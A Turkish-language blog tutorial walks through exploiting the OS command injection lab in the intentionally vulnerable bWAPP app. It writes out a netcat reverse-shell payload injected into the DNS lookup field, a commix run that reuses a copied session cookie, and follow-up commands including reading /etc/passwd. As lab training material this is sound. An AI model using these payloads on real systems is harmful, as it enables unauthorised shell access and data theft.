bWAPP | OS Command Injection Açığı

Merhaba değerli okurum,web uygulama güvenliği serimize devam ediyoruz.Bu eğitimimiz ise OS Command Injection açığını kullanıp sızma işlemi yapacağız.

3.bWAPP | OS Command Injection 

İşletim sistemi komut enjeksiyonu (kabuk enjeksiyonu olarak da bilinir), bir saldırganın bir uygulamayı çalıştıran sunucuda rasgele işletim sistemi (OS) komutları yürütmesine olanak tanıyan ve genellikle uygulamanın ve tüm verilerinin tamamen güvenliğini sağlayan bir web güvenlik açığıdır. Çoğu zaman, bir saldırgan, barındırma altyapısının diğer bölümlerinden ödün vermek için bir OS komut enjeksiyon güvenlik açığından yararlanabilir ve saldırıyı kuruluş içindeki diğer sistemlere döndürmek için güven ilişkilerinden yararlanabilir.

1.Saldırımızı seçiyoruz ve hack diyoruz.

2.Terminal panelini açıyoruz ve nc –nvlp 1234 diyerek portu dinlemeye alıyoruz.

3.Bwapp sayfasında DNS lookup kısmına :nc 127.0.0.1 1234 –e/bin/bash yazıyoruz ve lookup diyoruz.

4.Terminal penceresinde yerel ip ye bağlanıldı mesajını alıyoruz.


5.pwd komutunu yazarak geçerli dizin yolu bilgisini elde ediyoruz.


6.uname –a diyerek işletim sisteminin adını, sürümünü ve 64 bit olduğunu, debian dağıtım paketi olduğunu ve bilgisayar kullanıcısının ismi gibi yerel bilgileri elde ediyoruz.

7.Zorluk seviyesi kısmına gelerek seviyeyi medium yapıyoruz.

8.Terminal penceresini açarak commix komutunu açıyoruz. Commix aracı, web uygulamalarındaki komut enjeksiyonunun güvenlik açığından yararlanmak için kullanılır. Bu araç python ile yazılmıştır, yani Linux, windows ve mac ile uyumludur. Kali Linux, BlackArch ve Parrot OS'de önceden kurulu olarak gelir.

9.Terminalimize commix dedikten sonra url’mizi bwapp sayfasından kopyalıyoruz ve terminale yapıştırıyoruz.

10.Daha sonra burp suitimizi açıyoruz ve cookie bilgimizi kopyalayıp terminalimize yapıştırıyoruz.

11.Son olarak da --data=target=google.com&form=submit diyerek veri kısmını yazıyoruz ve enter diyoruz.

12. (Sonuç tabanlı) klasik komut enjeksiyon noktasına devam etmek istiyor musunuz? Diye bize soru soruyor. Buna y diyoruz ve devam ediyoruz.

13. Pseudo-Terminal kabuğu ister misiniz? Diyor buna da y diyoruz.

14.Whoami komutunu yazarak aktif kullanıcıların kimliklerine bakıyoruz.

15.ls komutuyla bulunduğunuz dizindeki hangi dosyaların olduğunu buluyoruz.

16.pwd komutunu yazarak geçerli dizin yolu bilgisini elde ediyoruz.

17. Aynı şekil de uname –a diyerek işletim sisteminin adını, sürümünü ve 64 bit olduğunu, debian dağıtım paketi olduğunu ve bilgisayar kullanıcısının ismi gibi yerel bilgileri elde ediyoruz.

18.nc 127.0.0.1 1234 –e/bin/bash komutunu yazdık bize bir şey döndürmedi.

19.cat/etc/passwd komutunu yazdık bu komut da bize bir çıktı döndürmedi. Bu saldırımızdan bu kadar bilgi elde edebildik.

Bir bWAPP Web Güvenliği Açığınında sonuna geldik.Diğer eğitimde görüşmek üzere :)

Yorum Gönderme

0 Yorumlar